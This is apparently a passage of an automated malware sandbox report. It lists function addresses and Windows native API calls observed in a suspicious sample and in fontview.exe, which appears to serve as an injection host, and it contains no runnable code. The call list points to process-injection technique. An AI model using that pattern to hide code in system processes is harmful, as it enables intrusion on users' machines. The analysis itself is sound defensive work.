Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402F30 NtCreateSection,LdrInitializeThunk,	12_2_04402F30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402FE0 NtCreateFile,LdrInitializeThunk,	12_2_04402FE0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402FB0 NtResumeThread,LdrInitializeThunk,	12_2_04402FB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402AD0 NtReadFile,LdrInitializeThunk,	12_2_04402AD0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402AF0 NtWriteFile,LdrInitializeThunk,	12_2_04402AF0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402B60 NtClose,LdrInitializeThunk,	12_2_04402B60
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_04402BE0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_04402BF0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_04402BA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044035C0 NtCreateMutant,LdrInitializeThunk,	12_2_044035C0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044039B0 NtGetContextThread,LdrInitializeThunk,	12_2_044039B0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402C00 NtQueryInformationProcess,	12_2_04402C00
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402CC0 NtQueryVirtualMemory,	12_2_04402CC0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402CF0 NtOpenProcess,	12_2_04402CF0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402D00 NtSetInformationFile,	12_2_04402D00
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402DB0 NtEnumerateKey,	12_2_04402DB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402E30 NtWriteVirtualMemory,	12_2_04402E30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402EA0 NtAdjustPrivilegesToken,	12_2_04402EA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402F60 NtCreateProcessEx,	12_2_04402F60
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402F90 NtProtectVirtualMemory,	12_2_04402F90
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402FA0 NtQuerySection,	12_2_04402FA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402AB0 NtWaitForSingleObject,	12_2_04402AB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04402B80 NtQueryInformationFile,	12_2_04402B80
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04403010 NtOpenDirectoryObject,	12_2_04403010
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04403090 NtSetValueKey,	12_2_04403090
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04403D70 NtOpenThread,	12_2_04403D70
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04403D10 NtOpenProcessToken,	12_2_04403D10
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00199230 NtCreateFile,	12_2_00199230
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_001993A0 NtReadFile,	12_2_001993A0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00199490 NtDeleteFile,	12_2_00199490
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00199530 NtClose,	12_2_00199530
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_001996A0 NtAllocateVirtualMemory,	12_2_001996A0

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD2298	0_2_00AD2298
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD20DD	0_2_00AD20DD
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD202C	0_2_00AD202C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD2163	0_2_00AD2163
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD2288	0_2_00AD2288
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD2B82	0_2_00AD2B82
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD2B90	0_2_00AD2B90
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1350	0_2_00AD1350
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD36F9	0_2_00AD36F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1641	0_2_00AD1641
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1650	0_2_00AD1650
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD3708	0_2_00AD3708
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD19C5	0_2_00AD19C5
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1A45	0_2_00AD1A45
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1B5A	0_2_00AD1B5A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1C30	0_2_00AD1C30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1C61	0_2_00AD1C61
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1DE9	0_2_00AD1DE9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD1E8D	0_2_00AD1E8D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C79A40	0_2_04C79A40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C7E8D0	0_2_04C7E8D0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C7E8E0	0_2_04C7E8E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C735A8	0_2_04C735A8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C715B4	0_2_04C715B4
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C735B8	0_2_04C735B8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C79EF8	0_2_04C79EF8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C79F40	0_2_04C79F40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_04C79A31	0_2_04C79A31
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F81E78	0_2_08F81E78
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F89050	0_2_08F89050
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8E4D8	0_2_08F8E4D8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F88B00	0_2_08F88B00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8AF90	0_2_08F8AF90
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8AF80	0_2_08F8AF80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8A1A8	0_2_08F8A1A8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8A198	0_2_08F8A198
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8A5E0	0_2_08F8A5E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004186C3	10_2_004186C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00403060	10_2_00403060
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004168D3	10_2_004168D3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040E113	10_2_0040E113
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00410133	10_2_00410133
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004011C0	10_2_004011C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040E257	10_2_0040E257
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040E263	10_2_0040E263
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00402398	10_2_00402398
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004023A0	10_2_004023A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0042EEA3	10_2_0042EEA3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040FF0A	10_2_0040FF0A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040FF13	10_2_0040FF13
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0040272C	10_2_0040272C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00402730	10_2_00402730
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01438158	10_2_01438158
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0100	10_2_013A0100
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144A118	10_2_0144A118
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014681CC	10_2_014681CC
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014641A2	10_2_014641A2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014701AA	10_2_014701AA
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01442000	10_2_01442000
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146A352	10_2_0146A352
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014703E6	10_2_014703E6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BE3F0	10_2_013BE3F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450274	10_2_01450274
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014302C0	10_2_014302C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0535	10_2_013B0535
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01470591	10_2_01470591
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01462446	10_2_01462446
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01454420	10_2_01454420
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145E4F6	10_2_0145E4F6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0770	10_2_013B0770
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D4750	10_2_013D4750
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AC7C0	10_2_013AC7C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CC6E0	10_2_013CC6E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C6962	10_2_013C6962
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B29A0	10_2_013B29A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0147A9A6	10_2_0147A9A6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B2840	10_2_013B2840
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BA840	10_2_013BA840
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013968B8	10_2_013968B8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013DE8F0	10_2_013DE8F0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146AB40	10_2_0146AB40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01466BD7	10_2_01466BD7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AEA80	10_2_013AEA80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BAD00	10_2_013BAD00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144CD1F	10_2_0144CD1F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C8DBF	10_2_013C8DBF
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013AADE0	10_2_013AADE0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0C00	10_2_013B0C00
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A0CF2	10_2_013A0CF2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01450CB5	10_2_01450CB5
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01424F40	10_2_01424F40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013D0F30	10_2_013D0F30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013F2F28	10_2_013F2F28
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01452F30	10_2_01452F30
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BCFE0	10_2_013BCFE0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0142EFA0	10_2_0142EFA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A2FC8	10_2_013A2FC8
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146EE26	10_2_0146EE26
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B0E59	10_2_013B0E59
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146EEDB	10_2_0146EEDB
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013C2E90	10_2_013C2E90
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146CE93	10_2_0146CE93
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0147B16B	10_2_0147B16B
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139F172	10_2_0139F172
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013E516C	10_2_013E516C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013BB1B0	10_2_013BB1B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145F0CC	10_2_0145F0CC
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146F0E0	10_2_0146F0E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014670E9	10_2_014670E9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B70C0	10_2_013B70C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146132D	10_2_0146132D
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0139D34C	10_2_0139D34C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013F739A	10_2_013F739A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B52A0	10_2_013B52A0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014512ED	10_2_014512ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CB2C0	10_2_013CB2C0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01467571	10_2_01467571
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014795C3	10_2_014795C3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144D5B0	10_2_0144D5B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A1460	10_2_013A1460
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146F43F	10_2_0146F43F
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146F7B0	10_2_0146F7B0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013F5630	10_2_013F5630
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_014616CC	10_2_014616CC
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01445910	10_2_01445910
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B9950	10_2_013B9950
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CB950	10_2_013CB950
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0141D800	10_2_0141D800
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B38E0	10_2_013B38E0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146FB76	10_2_0146FB76
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01425BF0	10_2_01425BF0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CFB80	10_2_013CFB80
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013EDBF9	10_2_013EDBF9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01467A46	10_2_01467A46
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146FA49	10_2_0146FA49
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01423A6C	10_2_01423A6C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0145DAC6	10_2_0145DAC6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013F5AA0	10_2_013F5AA0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01451AA3	10_2_01451AA3
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0144DAAC	10_2_0144DAAC
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01461D5A	10_2_01461D5A
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01467D73	10_2_01467D73
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B3D40	10_2_013B3D40
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013CFDC0	10_2_013CFDC0
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01429C32	10_2_01429C32
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146FCF2	10_2_0146FCF2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146FF09	10_2_0146FF09
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B1F92	10_2_013B1F92
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01373FD5	10_2_01373FD5
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01373FD2	10_2_01373FD2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0146FFB1	10_2_0146FFB1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013B9EB0	10_2_013B9EB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04482446	12_2_04482446
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04474420	12_2_04474420
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0447E4F6	12_2_0447E4F6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D0535	12_2_043D0535
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04490591	12_2_04490591
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043EC6E0	12_2_043EC6E0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D0770	12_2_043D0770
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043F4750	12_2_043F4750
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043CC7C0	12_2_043CC7C0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04462000	12_2_04462000
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04458158	12_2_04458158
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043C0100	12_2_043C0100
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0446A118	12_2_0446A118
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044881CC	12_2_044881CC
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044901AA	12_2_044901AA
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044841A2	12_2_044841A2
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04470274	12_2_04470274
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044502C0	12_2_044502C0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448A352	12_2_0448A352
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044903E6	12_2_044903E6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043DE3F0	12_2_043DE3F0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D0C00	12_2_043D0C00
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043C0CF2	12_2_043C0CF2
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04470CB5	12_2_04470CB5
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043DAD00	12_2_043DAD00
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0446CD1F	12_2_0446CD1F
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043E8DBF	12_2_043E8DBF
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043CADE0	12_2_043CADE0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D0E59	12_2_043D0E59
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448EE26	12_2_0448EE26
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448EEDB	12_2_0448EEDB
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043E2E90	12_2_043E2E90
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448CE93	12_2_0448CE93
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04444F40	12_2_04444F40
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043F0F30	12_2_043F0F30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04412F28	12_2_04412F28
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04472F30	12_2_04472F30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043DCFE0	12_2_043DCFE0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0444EFA0	12_2_0444EFA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043C2FC8	12_2_043C2FC8
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043DA840	12_2_043DA840
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D2840	12_2_043D2840
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043B68B8	12_2_043B68B8
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043FE8F0	12_2_043FE8F0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043E6962	12_2_043E6962
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D29A0	12_2_043D29A0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0449A9A6	12_2_0449A9A6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043CEA80	12_2_043CEA80
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448AB40	12_2_0448AB40
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04486BD7	12_2_04486BD7
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043C1460	12_2_043C1460
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448F43F	12_2_0448F43F
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04487571	12_2_04487571
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044995C3	12_2_044995C3
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0446D5B0	12_2_0446D5B0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04415630	12_2_04415630
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044816CC	12_2_044816CC
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448F7B0	12_2_0448F7B0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0447F0CC	12_2_0447F0CC
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044870E9	12_2_044870E9
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448F0E0	12_2_0448F0E0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D70C0	12_2_043D70C0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0449B16B	12_2_0449B16B
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0440516C	12_2_0440516C
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043BF172	12_2_043BF172
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043DB1B0	12_2_043DB1B0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_044712ED	12_2_044712ED
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043EB2C0	12_2_043EB2C0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448132D	12_2_0448132D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043BD34C	12_2_043BD34C
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0441739A	12_2_0441739A
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04449C32	12_2_04449C32
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448FCF2	12_2_0448FCF2
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04481D5A	12_2_04481D5A
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04487D73	12_2_04487D73
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D3D40	12_2_043D3D40
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043EFDC0	12_2_043EFDC0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D9EB0	12_2_043D9EB0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448FF09	12_2_0448FF09
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D1F92	12_2_043D1F92
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04393FD2	12_2_04393FD2
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04393FD5	12_2_04393FD5
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448FFB1	12_2_0448FFB1
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0443D800	12_2_0443D800
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D38E0	12_2_043D38E0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04465910	12_2_04465910
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043D9950	12_2_043D9950
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043EB950	12_2_043EB950
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448FA49	12_2_0448FA49
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04487A46	12_2_04487A46
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04443A6C	12_2_04443A6C
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0447DAC6	12_2_0447DAC6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04415AA0	12_2_04415AA0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04471AA3	12_2_04471AA3
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0446DAAC	12_2_0446DAAC
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0448FB76	12_2_0448FB76
